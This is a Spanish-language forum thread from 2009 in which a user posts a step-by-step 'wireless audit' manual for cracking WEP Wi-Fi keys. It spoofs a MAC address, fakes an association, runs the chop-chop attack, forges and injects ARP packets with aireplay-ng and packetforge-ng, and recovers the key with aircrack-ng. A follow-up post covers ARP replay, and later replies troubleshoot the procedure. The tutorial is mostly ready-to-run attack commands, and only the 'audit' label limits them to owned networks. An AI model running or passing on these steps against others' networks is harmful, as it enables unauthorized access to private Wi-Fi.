| Autor |
Mensaje |
Bron
Proyecto de GuRú
Registrado: Oct 18, 2007
Mensajes: 12729
Ubicación: Guadalajara e Iriepal
|
  |
 Publicado:
Lunes 01 Junio 2009, 18:34 |
Manual CHOP CHOP [Auditoría Wireless]
Aquí tenéis este
manual para generar tráfico cuando no hay ningún cliente asociado al punto de acceso (o red wifi)
y por tanto, no hay tráfico, es un ataque que una vez hecho genera mucho tráfico, pero no siempre funciona con todas las redes wifis.
Una vez aclarado ésto podemos empezar
(he utilizado Wifiway 1.0 Final)
.
Lo podéis descargar de aquí:
Wifiway 1.0 Final
El MD5 de este archivo es: 2fac135cad7b185706bbcb9c51f45932 COMPROBADLO!!
Cambiar la MAC de nuestra tarjeta wireless:
Abrimos un terminal y ponemos:
macchanger -m MAC QUE QUERAMOS [interfaz]
Ejemplo:
macchanger -m 00:01:02:03:04:05 wlan0
Ponemos la tarjeta en modo monitor para poder coger los paquetes
Como en el anterior manual dijimos...
airmon-ng start [interfaz]
Ejemplo:
airmon-ng start wlan0
Abrimos airodump para apuntar canal, bssid y el ssid
Abrimos airodump-ng, desde Inicio/Wireless/suite/airodump-ng y vemos todos los wifis que hay a nuestro alrededor, apuntamos el canal que usa el wifi que queremos auditar así como el bssid y el ssid de dicha red wifi.
Ahora abrimos una consola (o terminal) y ponemos lo siguiente:
airodump-ng -c CANAL -b BSSID -w NOMBRE CAPTURA [interfaz]
Ejemplo:
airodump-ng -c 3 -b 00:02:CF:43:23 -w captura wlan0
Dejamos este terminal abierto hasta el final, no lo cerréis.
Nos asociamos a la red wifi (Asociación Falsa)
Ahora procedemos a asociarnos al AP con la MAC falseada que hemos hecho antes.
aireplay-ng -1 10 -e SSID -a BSSID -h MAC QUE TENEMOS (FALSA) [interfaz]
Ejemplo:
aireplay-ng -1 10 -e Gorrion -a 00:02:CF:13:41 -h 00:01:02:03:04:05 wlan0
Dejamos esta consola abierta, igual que la de airodump, NO LAS CERRÉIS!!!
Lanzamos el ataque chop chop
Ahora vamos a lanzar este ataque para conseguir un paquete WEP.
Abrimos la consola y ponemos:
aireplay-ng -4 -h MAC QUE TENEMOS (FALSA) [interfaz]
Nos pedirá que si queremos ese paquete WEP que ha cogido, debemos mirar que el BSSID que tiene es el mismo que el que hemos seleccionado nosotros, si lo es, ponemos [y] y le damos a enter, entonces comenzará el proceso (tarda 1 minuto aproximadamente), cuando termine creará dos ficheros en root, uno con extensión .CAP y otro con extensión .XOR.
No cerréis la consola, porque si lo hacéis luego os tiraréis de los pelos...
Saber la IP de la red wifi
Ahora vamos a ver qué IP usa nuestra WIFI, si ya sabemos que es la de toda la vida (192.168.1.1) podemos saltarnos este paso.
tcpdump -s 0 -n -e -r ARCHIVO.CAP
Como el nombre del archivo .cap es tan largo, copiamos (de la consola anterior) y pegamos aquí  . Pulsamos intro y os saldrán muchas cosas, aunque identificaréis fácilmente la IP de la red wifi.
Fabricar paquete ARP para inyectarlo
Fabricaremos un paquete ARP con los datos del AP y los nuestros para posteriormente inyectarlo con aireplay.
packetforge-ng -0 -a BSSID -h MAC QUE TENEMOS (FALSA) -k IP DEL AP -l IP DEL RANGO -y ARCHIVO.XOR (copiar y pegar del terminal abierto de antes) -w NOMBRE PAQUETE
Ejemplo:
packetforge-ng -0 -a 00:02:CF:13:15 -h 00:01:02:03:04:05 -k 192.168.1.1 -l 192.168.1.10 -y replay_etc.xor -w paquete
Inyección del paquete ARP fabricado
Procedemos a la inyección del paquete ARP fabricado anteriormente para conseguir IVs
aireplay-ng -2 -x 1024 -h MAC QUE TENEMOS (FALSA) -r ARCHIVO ARP FORJADO [interfaz]
Y le damos a enter, nos dirá que si queremos usarlo, ponemos [y] y le damos a enter para confirmar.
Ejemplo:
aireplay-ng -2 -x 1024 -h 00:01:02:03:04:05 -r paquete wlan0
En la captura como veis en lugar de 1024 tengo 300, eso es porque algunos AP no soportan tanto tráfico y se saturan, yo empezaría por 300 y luego subiendo de 300 en 300 hasta llegar a lo máximo (1024), en este caso, yo llegué a 1024 y no tuve ningún problema.
Esperar a que haya suficientes IVs
Ahora esperamos hasta que los #data de la pantalla del airodump (la que NO hemos cerrado antes) suban hasta un número decente.
Como sube rápido y no nos cuesta nada esperar, yo lo dejaría hasta llegar al millón (para asegurarnos que la clave la podrá sacar aircrack)
Ejecutamos Aircrack para conseguir la clave
Ahora ejecutamos aircrack para conseguir la clave, abrimos otra consola y ponemos:
aircrack-ng captura-01.cap
Tenéis que poner el nombre de la captura que habéis puesto anteriormente en el airodump, si no os acordáis o habéis cerrado, iros a /root y ahí veréis el archivo .cap, tomáis nota de su nombre y lo ponéis.
En pocos minutos tendréis la clave
Fijaos la diferencia de IVs y el corto espacio de tiempo, en 8 minutos, hemos captado más de 250.000 
Últimos comentarios sobre este manual
Suerte con este método para conseguir tráfico, ya que a veces no sale a la primera, y ni tan siquiera siempre sale...depende del punto de acceso.
Si el aircrack no ha sido capaz de sacar la clave con un millón de IVs (poco probable), esperad hasta llegar a un millón y medio y lo hará (y si no sale, ponlo en el foro a ver qué está pasando).
Con esto terminamos la auditoría wireless con cifrado WEP, espero que os haya sido útil, y sobre todo, que os hayáis divertido tanto como nosotros.
Como decía un profesor mío, cualquier duda, deseo, dificultad, ansia...levantáis la mano y me lo preguntáis 
Manual realizado por Bron para ADSLZone.net, con la inestimable ayuda de Victek y juju666.
|
_________________
El Blog De Bron:
http://sergiodeluz.wordpress.com
|
|
 
|
|
Bron
Proyecto de GuRú
Registrado: Oct 18, 2007
Mensajes: 12729
Ubicación: Guadalajara e Iriepal
|
| |
Publicado:
Domingo 21 Junio 2009, 23:32 |
Cuando HAY clientes conectados
Si la red wifi tiene un cliente asociado lo mejor es hacer la re-inyección de paquetes ARP, es igual que el chop-chop pero no hay que trabajarlo tanto para forjar el paquete etc.
Re-inyección de paquetes ARP:
aireplay-ng -3 -b BSSID -h MAC DEL CLIENTE ASOCIADO [interfaz]
Ejemplo:
aireplay-ng -3 -b 00:02:CF:69:69 -h 00:02:CE:11:11 wlan0
No tiene por qué ser instantáneo, esperad un poco, unos 4 o 5 minutos sería más que suficiente, os digo lo mismo que antes, algunas veces este tipo de ataques no funcionan con determinados puntos de acceso o redes wifi. |
_________________
El Blog De Bron:
http://sergiodeluz.wordpress.com
|
|
|
|
|
KaTuS
Moderador
Registrado: May 14, 2006
Mensajes: 3555
|
| |
Publicado:
Domingo 21 Junio 2009, 23:39 |
Muchisimas gracias Bron, estaba esperando este tutorial para toquetear un poco mas este tema. Un 10 para ti por tus pedazo de curros. |
_________________
|
|
|
|
|
gohuca
Administrador
Registrado: Nov 19, 2005
Mensajes: 28975
Ubicación: Valladolid
|
| |
Publicado:
Lunes 22 Junio 2009, 0:15 |
Gran trabajo Bron.
Sin duda servirá a mucha gente
Salu2
Gohuca |
_________________
¿A qué esperas? Visita
Softzone
. Firma by ssutton |
|
|
|
|
DAVID25TGN
Moderador
Registrado: Apr 30, 2005
Mensajes: 12331
Ubicación: En el N95,al ladito de PortAventura,TARRAGONA
|
| |
Publicado:
Lunes 22 Junio 2009, 5:15 |
|
|
|
sanobis
ZoNeR@ de éLiTe
Registrado: Oct 02, 2008
Mensajes: 239
|
| |
Publicado:
Sábado 27 Junio 2009, 22:20 |
Sin comentarios Bron  |
_________________
|
|
|
|
|
korcel
ZoNeR@
Registrado: Aug 06, 2009
Mensajes: 1
|
| |
Publicado:
Jueves 06 Agosto 2009, 12:44 |
Saludos:
Antes de nada muchas grcias por el manual.
Siguiendo tengo una pega ... despues de crear el ARP e insertarlo a 511 pps por segundo, me pasa que no me suben los datas, desde un primer momento subian pero muy lentamente.. se supone que deberian de subir muy rapido.
Sabeis que puede pasar?
muchas Gracias |
|
|
|
|
|
Bron
Proyecto de GuRú
Registrado: Oct 18, 2007
Mensajes: 12729
Ubicación: Guadalajara e Iriepal
|
| |
Publicado:
Jueves 06 Agosto 2009, 14:15 |
Lo inyectas a -x 1024??
Lo he probado en muchos routers y siempre ha funcionado...por ahora..., veamos qué ocurre |
_________________
El Blog De Bron:
http://sergiodeluz.wordpress.com
|
|
|
|
|
guarripei
ZoNeR@
Registrado: Feb 15, 2009
Mensajes: 34
|
| |
Publicado:
Viernes 28 Agosto 2009, 20:32 |
Saludos al foro, utilizo una tarjeta intel link 5100 con el wifiway y cuando le doy a airodump me dice operacion no soportado, antes la he puesto en modo monitor y creo que no hay que no hay ningun problema la pantalla que sale es como la del tutorial de Bron, aunque tambien he leido por hay que sale andando el programa en modo monitor con esta tarjeta pero por lo que creo con la mia no, se ve que es muy moderna todavia, incluso para el wifixlax no vale. Como veis soy muy poco entendido de esto o mas bien nada, y no sera por leer manuales que me he leido unos cuantos pero no se donde esta el fallo.
Saludos |
|
|
|
|
|
Bron
Proyecto de GuRú
Registrado: Oct 18, 2007
Mensajes: 12729
Ubicación: Guadalajara e Iriepal
|
| |
Publicado:
Viernes 28 Agosto 2009, 21:51 |
Buenas, entonces cuando pones la tarjeta en modo monitor si sale como en la imagen, no?
Pon este comando en la consola (una vez que la hayas puesto en modo monitor).
airodump-ng wlan0
wlan0= interfaz que uses, no sé si la tuya será wlan0, wlan1...
Para verlo pon en la consola:
iwconfig
Y ponme capturas de pantalla si puedes |
_________________
El Blog De Bron:
http://sergiodeluz.wordpress.com
|
|
|
|
|
|
|
Ir a página 1, 2, 3, 4, 5, 6 Siguiente
|
Ver tema siguiente
Ver tema anterior
Puede publicar nuevos temas en este foro
No puede responder a temas en este foro
No puede editar sus mensajes en este foro
No puede borrar sus mensajes en este foro
No puede votar en encuestas en este foro
|
|
49,90€
79,00€
50,54€
